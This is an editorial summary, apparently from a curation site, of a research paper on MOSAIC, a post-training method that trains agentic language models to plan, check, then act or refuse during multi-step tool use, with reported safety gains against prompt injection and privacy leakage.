Learning When to Act or Refuse: Guarding Agentic Reasoning Models for Safe Multi-Step Tool Use
Summary
The MOSAIC framework is a post-training method designed to align agentic language models for safe multi-step tool use, addressing limitations of existing alignment techniques in sequential decision-making and adversarial tool feedback. Agentic models, unlike chat models, can execute long-horizon actions, making safety critical due to potential irreversible harm from missteps like file access or credential entry. MOSAIC structures inference as a "plan, check, then act or refuse" loop, integrating explicit safety reasoning and refusal as primary actions. It utilizes preference-based reinforcement learning with pairwise trajectory comparisons for training, bypassing the need for trajectory-level labels and capturing subtle safety distinctions. Evaluated zero-shot across Qwen2.5-7B, Qwen3-4B-Thinking, and Phi-4 model families, MOSAIC reduced harmful behavior by up to 50%, increased harmful-task refusal by over 20% on injection attacks, decreased privacy leakage, and maintained or improved benign task performance across various out-of-distribution benchmarks.
Key takeaway
For engineering teams developing agentic language models that interact with tools, MOSAIC offers a robust post-training framework to enhance safety. Your models can achieve up to 50% reduction in harmful behavior and over 20% increased refusal on injection attacks by implementing explicit safety reasoning and refusal mechanisms. Consider adopting a "plan, check, then act or refuse" loop to mitigate risks associated with multi-step tool use and improve overall agent reliability.
Key insights
MOSAIC aligns agentic models for safe multi-step tool use by making safety decisions explicit and learnable.
Principles
- Explicit safety reasoning improves agentic model alignment.
- Refusal is a first-class action for safe agents.
Method
MOSAIC structures inference as a "plan, check, then act or refuse" loop, trained via preference-based reinforcement learning using pairwise trajectory comparisons to capture safety distinctions.
In practice
- Integrate explicit safety checks into agentic workflows.
- Prioritize refusal as a core agent capability.
Topics
- Agentic AI Safety
- Multi-Step Tool Use
- Preference-Based Reinforcement Learning
- AI Refusal Mechanisms
- Prompt Injection
Best for: Research Scientist, CTO, VP of Engineering/Data, AI Researcher, AI Scientist, AI Security Engineer
Related on AIssential
Editorial summary, takeaway, and curation by AIssential. Original article published by Computation and Language.